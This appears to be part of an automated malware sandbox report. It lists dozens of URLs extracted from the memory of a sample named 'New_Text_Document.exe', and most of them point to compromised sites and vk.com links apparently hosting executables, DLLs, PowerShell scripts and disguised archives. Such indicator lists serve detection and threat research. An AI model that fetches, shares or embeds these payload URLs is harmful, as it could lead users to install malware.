                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://threerosesbeauty.com/mise/Gestione.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://threerosesbeauty.com/mise/Normativa.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://threerosesbeauty.com/mise/Servizi.zip
                    Source: svchost.exe, 00000006.00000003.1368426234.0000020CEEA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1381946680.0000020CEEA62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://topsepatu.com/tra/im.png
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toquedebolafc.com.br/wp-admin/Install.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://travelinghouse.pk/es/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://travelwithmanta.co.za/r6x7x6rf.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://trello.com/1/cards/64ad55750e1ff165be58e92d/attachments/64ad56d2d99287b0521c88ec/download/Ca
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://trieutin.com/loader/uploads/Lzsyekr_Tkhbeypy.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://trieutin.com/loader/uploads/Rahde_Bymoxstj.bmp
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://trieutin.com/loader/uploads/new-one_Eptbkolf.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://trieutin.com/loader/uploads/rocket_Cldzsvma.bmp
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://trtmyanmar.com/wp-content/plugins/yjmqxmidki/a/hyehwggs.ps1
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ttf.api.net.bd/qi/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tuadministrador.cl/isl/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tukudewe.com/js/01b1v2g3.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tukudewe.com/js/nine18.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tupperware.michaelroberge.ca/wp-includes/js/tinymce/skins/lightgray/mon48_cr.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ukguk71.ru/libraries/vendor/joomla/registry/src/Format/pinafore.php
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ultraliainsurance.com/tam/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://unapromo.com/mise/Cliente.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://unapromo.com/mise/Funzioni.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://unapromo.com/mise/Normativa.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://unapromo.com/mise/Servizi.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uniformescorporativos.com/oac/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://unioneterna.com/scarica/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://upload.vina-host.com/8DQEmME5CV/Creal.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://upload.vina-host.com/HQM42gUnRU/windows.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/644/749/original/new_image.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.0000000003311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://urlhaus.abuse.ch
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.0000000003311000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000000.1201522121.0000000000F92000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://urlhaus.abuse.ch/downloads/text_online/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uscreditfixers.com/iupd/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uxsingh.com/uxsingh.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://venuslifts.com/on/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://viacosmeticos.com/sod/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vidaviajesperu.com/download/File_pass1234.7z
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://village-auto.net/sut/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://village-auto.net/uent/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vimeo.com/api/v2/video/804838895.json
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://visibleangle.com/sa/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667141516?hash=HsWBQHEyToldG20L9sZwIGv5gYpaCVz2I4NaffNltj4&dl=bzijOkGFnqM
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667143029?hash=YaHjWmyxRINryK8RG4jf9Q7z1vpbIEkqZdIe3Sy9zCz&dl=COVoLTV0XhZ
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667162081?hash=4BgzraSUlIskCw5J6xGm3ViPzq8b7svHxEssqfvoCPH&dl=LANzNVd3qg5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667162993?hash=ItsZQY276O4auy923f2zUnmqzzgNonSSgHUZKsBIJbg&dl=ZdTjHSszfia
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667167826?hash=PUZ6w3y0YWsBf44ZIzbeDXawnbwL6aPzLMptBgiatxg&dl=3BimqpZpkqf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667169888?hash=0FXstFY9YauEmcBFs6Ju2Y5tz7xvBx6HWmEsxICLiEk&dl=ZYeU9AHGQRs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667189225?hash=tBcEyZzquzh5nPVDOjnqQCTAbRDk7gsIb835iT38L0o&dl=vSMCJ9sAWCu
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667189451?hash=7xGZU0cMYSHNqbzqt2AP9GuJLwlmznUeKyo3yrg5rzz&dl=tPinVK3RMIv
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667205062?hash=Svqj7zCdrED1hyD81lRt9NeObuiSXNy8bJzdPsMUx1w&dl=zCXthZXeky7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667233820?hash=ksqvnpPOTVnZUBQvgNWMHz7b34SlhrJYzyLwhjI3p2w&dl=9z5K5NGG8CQ
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667234644?hash=yWOvrpEg4V3zOtjzBrHI0SiQirVR7d1DC7DP96zs0ko&dl=zsxO0xy0DAb
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667243744?hash=iCeRiYkiIxo74UR6vMM7ozUn1JpsrBw7IbfGz2VZcPH&dl=5beks65AYix
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667257209?hash=x3WAPvrzPB3Kno4uPjtjMZbAtkPE2Nnn2j8uwrE6QQg&dl=ZGEgXE3qKSN
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667260318?hash=5fIVbEMD7QFCeMOR3scNeKxSNfqeBg9KoduBU4Y3tID&dl=koAos1zT2ze
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667272921?hash=dAoPCf7QsvjVdQ3kzjr7ccy2E619quOC6BKz3iklMog&dl=UpBaiumhq92
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667276452?hash=wkBRUPYuo43rYtxIzQc6pAfTM1sBDD9zNWcmfsnUyZk&dl=pSqUmbLaVdy
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667276497?hash=bryapz2guwBSPFqdmLqarqzHAHbCwGuWg4mr4ZKWirP&dl=RRyrRyDZkXX
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667299917?hash=ZBXZXgvR0VGrrHhRL8ouG0pmaOgq5CMqSVSg07KQ3kD&dl=VP4eeCrZnI7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667300123?hash=vB0PFSRZmmiwBOmp2gWqOhrZINM6UaA1gk4BeiCFIoT&dl=2KJQAeojXTZ
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667323207?hash=ZkIwTTYNTwNDXLt5Gs5EEchtp6n7cf7VmKRYfvfVcZc&dl=ZTGusJZiiet
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667326156?hash=RPTZqzfbhYSxCQabFbfwGz9pZXUf2a3MNI37xJyP9eo&dl=7CVnsFQ5xjN
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667329802?hash=GaKmzrBd2yNz06Rjr3iQLD0xXwPX2uib77cPCZINWNz&dl=DbozXvnzSxs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667339795?hash=Vr6hZn5xlDzZsz30TpnTzHAO4DHKke3DmD4kGhoeqoH&dl=6fzaZ8xtsOz
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667343838?hash=zdFRocOdJtT0IyxFdnygjsrvYEitfza6BvyL25bGpZD&dl=sHDqrRzc8uN
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667345691?hash=b2GSJerzQ21MGzq3fbxSH4ZU7wFsRgdMXupM5JVGGe8&dl=CHVE21CiJhK
